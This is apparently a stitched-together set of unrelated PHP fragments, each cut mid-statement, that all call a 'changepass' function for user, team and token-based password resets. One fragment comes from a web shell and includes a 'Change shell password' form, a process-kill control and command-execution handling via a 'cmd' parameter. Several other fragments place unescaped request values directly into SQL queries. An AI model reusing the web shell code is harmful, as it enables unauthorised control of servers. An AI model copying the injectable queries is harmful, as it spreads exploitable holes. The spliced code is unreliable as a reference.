echo "<h4>" . translate("Updating user") . " ...</h4>"; $userdescription = addslashes(nl2br($userdesc)); $query = "update " . $USER_TB . " set password='******',group_id='{$usertype}',description='{$userdescription}' where user_id='" . $id . "'"; $result = mysql_query($query); if ($userid == $id) { $_SESSION["password"] = $cryptpass; } echo "<meta http-equiv=\"refresh\" content=\"0; url=cal_user.php?op=users\">"; } switch ($op) { // add new user case "adduser": adduserform(); break; // change user password/group form // change user password/group form case "changepass": changepass($userid); break; // change user password/group // change user password/group case "updateuser": updateuser($id, $usertype, $passwd, $userdesc); break; // default: bar, and show new submissions // default: bar, and show new submissions default: adduserform(); break; } include 'cal_footer.inc.php';
} UserChangeInformation($UUser, $UAddress, $UPhone, $UEmail); include 'view/user_profile.php'; break; case 'show_department': include 'view/department.php'; break; case 'show_profile_different': $_SESSION['view_people'] = $_GET['EId']; include 'view/user_profile.php'; break; case 'change_password': $old = $_POST['opwd']; $new1 = $_POST['pwd1']; $new2 = $_POST['pwd2']; changepass($_SESSION['is_valid'], $old, $new1, $new2); include 'view/user_profile.php'; break; case 'UserChangeImage': if (isset($_POST['ok'])) { if ($_FILES['file']['name'] != NULL) { if ($_FILES['file']['type'] == "image/jpeg") { if ($_FILES['file']['size'] > 10485760) { echo "<script type='text/javascript'>alert('File không được lớn hơn 1Mb');</script>"; } else { $path = "img\\employee\\"; $tmp_name = $_FILES['file']['tmp_name']; $name = $_FILES['file']['name']; $type = $_FILES['file']['type']; $size = $_FILES['file']['size']; // Upload file
} } } $colspan = count($s_psln) + 1; $s_result .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'>\n\t\t\t<form action='" . $s_self . "' method='post'><input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' /><label for='checkalll' class='css-label'></label></form>\n\t\t\t</td><td style='text-indent:10px;padding:2px;' colspan=" . $colspan . "><a href='javascript: pkill();'>kill selected <span id='total_selected'></span></a></td>\n\t\t\t</tr></tfoot></table>"; } } elseif (isset($_GP['x']) && $_GP['x'] == 'pass') { if (isset($_GP['submitnewpass'])) { $newpass = isset($_GP['newpass']) ? trim($_GP['newpass']) : ""; $newpassx = isset($_GP['newpassx']) ? trim($_GP['newpassx']) : ""; if (empty($newpass) || empty($newpassx)) { $s_result .= notif('Give your new password to both fields'); } elseif ($newpass != $newpassx) { $s_result .= notif('Password does not match'); } else { if (changepass($newpass)) { $s_result .= notif("Password changed"); } else { $s_result .= notif("Unable to change password"); } } } $s_result .= "<div class='mybox'><h2>Change shell password</h2>\n\t\t\t<form action='" . $s_self . "' method='post' />\n\t\t\t<table class='myboxtbl'>\n\t\t\t<tr><td style='width:120px;'>New password</td><td><input style='width:100%;' class='inputz' type='password' name='newpass' value='' /></td></tr>\n\t\t\t<tr><td style='width:120px;'>Confirm password</td><td><input style='width:100%;' class='inputz' type='password' name='newpassx' value='' /></td></tr>\n\t\t\t</table>\n\t\t\t<input type='submit' name='submitnewpass' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n\t\t\t<input type='hidden' name='x' value='pass' />\n\t\t\t</form>\n\t\t\t</div>"; } else { if (!isset($s_cwd)) { $s_cwd = ""; } if (isset($_GP['cmd'])) { $s_cmd = $_GP['cmd']; if (strlen($s_cmd) > 0) { if (preg_match('#^cd(\\ )+(.*)#', $s_cmd, $s_r)) {
} $private_key = $config['private_key']; $hash = isset($_POST['hash']) ? $_POST['hash'] : 0; $public_key = isset($_POST['public']) ? $_POST['public'] : 0; $time = isset($_POST['t']) ? $_POST['t'] : 0; $myhash = md5($public_key . $private_key . $time); if ($hash != $myhash) { echo json_encode(array('error' => '1', 'status' => $lang[215])); exit; } $bool = false; $op = isset($_POST['op']) ? $_POST['op'] : ''; $np1 = isset($_POST['np1']) ? $_POST['np1'] : ''; $np2 = isset($_POST['np2']) ? $_POST['np2'] : ''; // make sure these have value if (!$op and !$np1 and !$np2) { exit; } $bool = changepass($op, $np1, $np2, $user_id); if ($bool == 'invalid old password') { echo json_encode(array('error' => '1', 'status' => 'invalid', 'message' => $lang[338])); exit; } elseif ($bool == 'no match') { echo json_encode(array('error' => '1', 'status' => 'invalid', 'message' => $lang[339])); // new password did not match exit; } else { $_SESSION['user_password'] = $bool; echo json_encode(array('error' => '0', 'status' => 'success', 'message' => $lang[337])); exit; }
unset($lsdb_uname); } if (isset($_POST['pass']) && strlen($_POST['pass']) < 20) { $lsdb_pass = strip_tags($_POST['pass']); } else { unset($lsdb_pass); } switch ($myop) { case "logout": logout(); break; case "login": _login($lsdb_uname, $lsdb_pass); break; case "chgpwd": if (changepass() == 1) { # _login($uname, $newpass1); #userinfo($uname, $bypass); die("<h3>Changed ...</h3>"); } else { die("<h3>Error changing user values ...</h3>"); } break; default: if (isset($usertoken)) { user_main($usertoken); } else { user_main(array()); } break; }
} mysql_close($conn); ?> <script type="text/javascript"> document.title=document.title + " Change Password"; </script> <div class="main_content"> <?php include "leftwidget.php"; ?> <div class="center_table"> <?php if ($action == 'change') { changepass(); } else { ?> <form action="chpasswd.php?sub=<?php echo $subj; ?> &act=change&t=<?php echo $t; ?> " onSubmit="return passwdmatch()" method="post"> <table width="600" border="0" cellspacing="0" cellpadding="0"> <?php if ($subj == 'team') { ?> <tr> <th colspan="2" scope="col">Change Team Password</th>
} function checkpass($Tab) { if (!preg_match('/^[a-zA-Z.-_*^!:;,&]{6,25}$/', $Tab['password'])) { return "Mot de passe invalide, il doit être composé de 6 à 25 caractères."; } if ($Tab['password'] != $Tab['password2']) { return "Mot de passe invalide , les deux mot de passes doivent correspondrent."; } return "NoError"; } if ($_POST['change']) { $error = checkpass($_POST); if ($error != "NoError") { echo "<div class='error' ><p class='error-txt' >" . $error . "</p></div>"; } else { $error = changepass($_GET['mail'], $_GET['tok'], $_POST['password']); if ($error == "ok") { $_SESSION['msg'] = "<div class='success' ><p class='success-txt' >Mot de passe changé !</p></div>"; } else { $_SESSION['msg'] = "<div class='success' ><p class='success-txt' >" . $error . "</p></div>"; } header("Location : login.php"); } } require_once "../View/changepass.php"; ?>